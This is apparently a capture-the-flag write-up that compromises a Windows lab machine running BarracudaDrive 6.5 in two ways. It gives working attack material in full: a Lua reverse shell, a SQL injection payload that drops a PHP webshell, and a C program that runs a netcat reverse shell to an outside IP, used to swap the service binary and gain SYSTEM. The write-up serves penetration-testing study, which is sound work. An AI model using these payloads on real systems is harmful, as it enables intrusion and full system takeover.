1st Way - Directly SYSTEM

Nmap

Initial nmap scan revealed SMB, MySQL and HTTP 8000 ports were open.

00nmap

Web Enumeration

Visiting the website revealed BarracudaDrive 6.5 was in use.

01webvers

Exploitation

It was a similar website like FuguHub. So at first I created admin user.

02setadmin

Then from customize page, I updated about page to lsp reverse shell.

<?lsp if request:method() == "GET" then ?>
    <?lsp 
        local host, port = "<IP>", <PORT>
        local socket = require("socket")
        local tcp = socket.tcp()
        local io = require("io")
        local connection, err = tcp:connect(host, port)
        
        if not connection then
            print("Error connecting: " .. err)
            return
        end
        
        while true do
            local cmd, status, partial = tcp:receive()
            if status == "closed" or status == "timeout" then break end
            if cmd then
                local f = io.popen(cmd, "r")
                local s = f:read("*a")
                f:close()
                tcp:send(s)
            end
        end
        
        tcp:close()
    ?>
<?lsp else ?>
    Wrong request method, goodBye! 
<?lsp end ?>

03customize

Visiting the about page got me SYSTEM shell.

04revshell

05gg

2nd way - Intended Way

Enumeration

Nmap also revealed two additional web ports were open.

00nmap2

00nmap3

Website at port 45332 was simple website that had no input points.

01 0 quiz web

Directory brute force revealed phpinfo.php file.

01 1 phpinfo dir

I noted down the DOCUMENT_ROOT variable.

01 2 document root

Other website at 33033 redirected us to user page. One of the users had a different description.

02sugoid

I could not login but there was a forgot password button. It required a reminder and I tried paranoid for the user and it worked. I logged in.

03paranoid

04loggedin

There was an experimental feature called request profile slug.

05user slug

So I tested SQL injection there and it worked.

06test

07sqli

Exploitation

So I used INTO OUTFILE query to put a webshell to DOCUMENT_ROOT.

' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'

08put file

And I was able to execute commands.

09gg

I transfered nc64.exe and executed it.

10nc64

Then simply got a reverse shell.

11local

Privilege Escalation

As we know BarracudaDrive 6.5 was in use which was vulnerable to Insecure Folder Permissions. I found an exploit description online (https://www.exploit-db.com/exploits/48789).

All I had to do is replace C:\bd\bd.exe with a malicious file and execute shutdown /r /t 0 to reboot.

So at first I created a malicious C file and compiled it with i686-w64-mingw32-gcc.

#include <stdlib.h>

int main(void){
     system("C:\\xampp\\htdocs\\nc64.exe 192.168.45.167 445 -e cmd.exe");
    return 0;
}

i686-w64-mingw32-gcc exp.c -l ws2_32 -o bd.exe

13expc

Then I moved normal bd.exe to bd.exe.bat and transfered malicious file.

14changed

Then set a nc reverse shell listener and rebooted the machine.

15reboot

After some time, I got a SYSTEM shell.

16gg

<
Previous Post
Snookums - Proving Grounds Practice
>
Next Post
Monster - Proving Grounds Practice